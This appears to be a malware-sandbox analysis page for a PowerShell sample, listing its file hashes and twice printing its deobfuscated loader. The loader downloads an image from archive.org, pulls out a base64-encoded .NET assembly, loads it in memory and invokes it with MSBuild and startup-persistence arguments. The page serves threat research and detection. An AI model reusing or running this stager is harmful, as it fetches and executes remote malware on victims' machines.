89a765fa19f24e1176a562db9278a6b1

PowerShell
|
MD5: 89a765fa19f24e1176a562db9278a6b1
|
Size: 1.03 MB
|
application/x-powershell

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	89a765fa19f24e1176a562db9278a6b1
Sha1	39f58c213f51c7e540711c91997acafa5d044bd3
Sha256	90e1d6f51384ef537001661e31850e2b749fc8d5e25141f09c044a77ab5ecdeb
Sha384	bf52a85b3c43d69ff7863d56fbc735bb38ce1a08f22d87192fbb73542ba8226d5cd6265cb333829e73bda54cbb640768
Sha512	39334ee73f9076034f32a5181ab9fc5e573a253462db9949e66f697059c0237874d8c9a56643ce62aa0062e88b281930b7a555281c1e8865341ed9a01ef78e8d
SSDeep	24576:aysOT1fxiVha1wcnysOT1fxiVha1wcjysOT1fxiVha1wcK:/sOPAHsOPAZsOPAP
TLSH	7125CF4E3567413AA485B0B8320A5163F09FC7D5C32AF3A2D0B0D469E195CBAE5FA773

File Structure

Artefacts

Name0	Value
Deobfuscated PowerShell	$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/optimized_msi_20250814/optimized_MSI.png" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==Ad4RnLlxWamRWZ0JXZ252bj9CNwcjN2YDMx8Cbk9yZy9mLzVGbpZGctR3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "MSBuild", "", "MSBuild", "", "", "", "Name_File", "js", "1", "", "", "0", "startup_onstart") } ))

Name0

Value

Deobfuscated PowerShell

89a765fa19f24e1176a562db9278a6b1 (1.03 MB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
Deobfuscated PowerShell	$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/optimized_msi_20250814/optimized_MSI.png" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==Ad4RnLlxWamRWZ0JXZ252bj9CNwcjN2YDMx8Cbk9yZy9mLzVGbpZGctR3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "MSBuild", "", "MSBuild", "", "", "", "Name_File", "js", "1", "", "", "0", "startup_onstart") } )) Malicious	89a765fa19f24e1176a562db9278a6b1 > [Base64-Block]

You must be signed in to post a comment.